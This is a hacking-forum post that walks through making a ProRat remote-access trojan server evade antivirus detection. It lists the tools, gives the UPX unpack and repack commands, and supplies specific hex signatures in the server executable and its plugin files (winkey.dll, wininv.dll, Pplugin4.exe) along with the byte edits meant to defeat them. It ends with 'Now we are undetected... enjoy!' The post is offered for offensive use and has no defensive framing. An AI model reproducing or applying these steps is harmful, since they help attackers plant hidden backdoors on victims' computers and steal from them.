Jump to content
RedJoker

Rapidshare Toolz Collection

By RedJoker, in Programe hacking

Recommended Posts

RedJoker Newbie

RedJoker

Posted
Posted

The required programs to complete this task.

1) ProRat Server. Found at: http://www.prorat.net.

2) UPX Packer/Unpacker. Found at: http://upx.sf.net

3) Hex Editor. (Hex Workshop recommended).

4) Fearless BFE

So lets start.

1) First simply create your Server via ProRat client with the settings which you choose.

2) Unpack the server. Go to Command Prompt and run upx.exe from there. After thats accomplished,

unpack the server.exe by writing in "upx -d server.exe". To repack it later on at the end, simply

write "upx -9 "server.exe".

3) AV's Have a selected piece of code within the server which tells whether it is a dangerous object

or not.

This part is the most important.

a) First lets stop it from being reconized. Prorat 1.9 un most reconized piece of code is C4C0535657 To

help you find it more easily, search up this longer piece of code.

8D09005F5E5B8BE55DC39090558BEC83C4C0535657

Now our code is

8D09005F5E5B8BE55DC39090558BEC83C4C0535657

we will change this too

8D09005F5E5B8BE55DC39090558BEC83C4C0535647 (this will be detected by now but just an example).

To make our server completely undetected, we will need to edit winkey.dll and wininv.dll.

How we can do this? Prorat is found in 3 different pieces. winkey.dll, wininv.dll and Pplugin4.exe.

To extract these files you will need Fearless BFE.

B) For stopping the AV's from reconizing this part of code we must do the same thing.

our code is

winkey.ddl:

0321450C837D0C007411A14C30001085C07408575653FFD0

we will change this too

0321450C837D0C007411A14C30001085C07408575653FF47

c) For stopping this part of the code being detected we must change the code once more.

our code is

wininv.ddl:

837D0C007411A15C31001085C07408575653FF

we will change this too

837D0C007411A15C31001085C0740857565347

d) One last time.

our code is

Pplugin4.exe:

6472712E696E6900637279707465642D70617373776F726400 0000000000

we will change it too

6472712E696E6900637279707465642D70617373776F726400 0000000047

Now we are undetected. Repack the file and enjoy!

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...